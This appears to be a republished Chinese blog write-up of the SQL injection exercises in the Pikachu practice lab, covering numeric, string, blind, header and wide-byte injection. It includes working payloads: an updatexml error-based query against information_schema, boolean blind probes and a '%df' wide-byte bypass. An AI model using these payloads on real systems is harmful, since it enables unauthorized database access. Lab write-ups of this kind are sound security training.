pikachu的sql注入

Posted p201721440034

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pikachu的sql注入相关的知识,希望对你有一定的参考价值。

数字型注入(post)

 burp抓包

技术图片

 成功

技术图片

 

 

 

字符型注入(get)

 直接注入

 成功注入。

 技术图片

 

 

 

搜索型注入

技术图片

 使用同样的方法也能同样注入成功

 

xx型注入

需要闭合

 加)之后注入成功。

技术图片

 

 

 

 

 

insert/updata 注入

a‘ or updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name=‘member‘ limit 1,1)), 0) or ‘

burp抓包修改

技术图片

 

 

 

注入成功。

delete 注入

 

技术图片

 

 

 

 注入成功

 

 

http header注入

技术图片

 

 

 

 注入成功

 

盲注 base on boolian

技术图片

 

 

 

 

 

kobe and length(database())>5#
。。。
kobe and length(database())=7#
kobe and ascii(substr(database(), 1, 1)) > 105#
慢慢盲注,只能挨个试。。

盲注(based on time)

 同样的也是挨个试,这次看对错是看这个反应时间,要是可以的话就会五秒多一些。

技术图片

 

 

 

宽字节注入

 刚开始尝试发现注入不行,抓包发现以及进行了编码

 在抓包后修改也不行  

 发现‘被后台转移,所以构造payload kobe%df or 1=1#

技术图片

 

 

 

 技术图片

 

 

 

 注入成功

以上是关于pikachu的sql注入的主要内容,如果未能解决你的问题,请参考以下文章

Pikachu-SQL注入

pikachu-SQL注入

Pikachu漏洞练习平台实验——SQL注入

web安全pikachu靶场之SQL注入

pikachu漏洞平台sql注入 之 数字型注入

pikachu的sql注入